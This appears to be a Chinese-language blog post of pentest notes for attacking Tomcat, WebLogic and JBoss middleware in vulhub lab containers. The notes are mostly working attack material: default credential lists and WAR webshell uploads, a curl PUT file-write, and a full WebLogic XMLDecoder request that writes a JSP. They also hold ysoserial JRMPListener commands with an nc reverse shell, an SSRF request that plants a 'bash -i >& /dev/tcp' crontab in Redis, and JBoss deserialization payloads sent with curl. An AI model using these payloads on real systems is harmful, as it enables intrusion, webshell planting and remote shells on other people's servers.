一些中间件测试常见步骤
周末陪陪家人
记录下一些中间件测试常见步骤
Tomcat
开始安装ubuntu,用sudo passwd root设置root密码,运行p神的vulhub时用root运行成功.
Tomcat7弱口令上传rar
sudo docker ps #查看启动的docker
http://127.0.0.1:8080/manager/html 口令tomcat
ma.jsp文件打包为zip改后缀名为ma.war,deploy后访问http://127.0.0.1:8080/ma/ma.jsp
root/root
tomcat/tomcat
admin admin
admin 123456Tomcat5-9 PUT写文件
curl -X PUT http://127.0.0.1:port/test.jsp/ -d @- < test.jsp
https://github.com/breaktoprotect/CVE-2017-12615
https://github.com/iBearcat/CVE-2017-12615
Weblogic
弱口令
常见弱口令
weblogic weblogic 或Oracle@123
system system
portaladmin portaladmin
guest guest部署-安装-上载文件ma.war(ma.jsp打包为ma.zip改名为ma.war)
访问127.0.0.1:7001/ma/ma.jsp 例子的目录命名为ma
Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞
写shell地址 http://127.0.0.1:7001/bea_wls_internal/test.jsp
burp发送即可
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
<void method="println"><string>
<![CDATA[
<% out.print("test"); %>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>Weblogic 10.3.6.0 && 12.1.3.0 && 12.2.1.2 && 12.2.1.3
poc
攻击者使被攻击主机请求JRMPListener主机(恶意payload),并执行
利用:
在JRMPListener主机上运行以下命令:
wget https://jitpack.io/com/github/frohoff/ysoserial/master/ysoserial-master.jar
java -cp ysoserial.jar ysoserial.exploit.JRMPListener [监听端口] CommonsCollections1 [执行命令]
例子:java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 反弹ip 反弹端口'监听
nc -lvvp 6666运行
python CVE-2018-2628.pyWeblogic 10.0.2 -- 10.3.6 ssrf
burp发包,探测端口
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close不存在则返回could not connect
Redis反弹shell
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.3:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: closeJBOSS
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
工具下载地址 http://scan.javasec.cn/java/JavaDeserH2HC.zip
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port //生成一个ReverseShellCommonsCollectionsHashMap.ser二进制文件
nc -l -vv 9999
curl http://192.168.1.109:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
弱口令 getshell过程
admin:admin
以下引用Nmask:
访问管理页面,查看jboss配置页面中的JMX Console,这是JBoss的管理台程序,进入后找到Jboss.deployment包,该包下有flavor=URL.type=DeploymentSccanner选项。进入部署页面后便可以上传war文件,但与tomcat不同的是它不是本地上传war文件,而是从远程地址下载,因此需要自己准备一个文件服务器,用于远程下载war到目标jboss服务器上。具体方法是在部署页面找到”ADDURL”方法,输入URL地址,点击invoke。除了以上方法外,JMX-Console提供的BSH方法,同样也可以部署war包。
JBoss JMXInvokerServlet 反序列化漏洞
tools https://cdn.vulhub.org/deserialization/DeserializeExploit.jar
浙公网安备 33010602011771号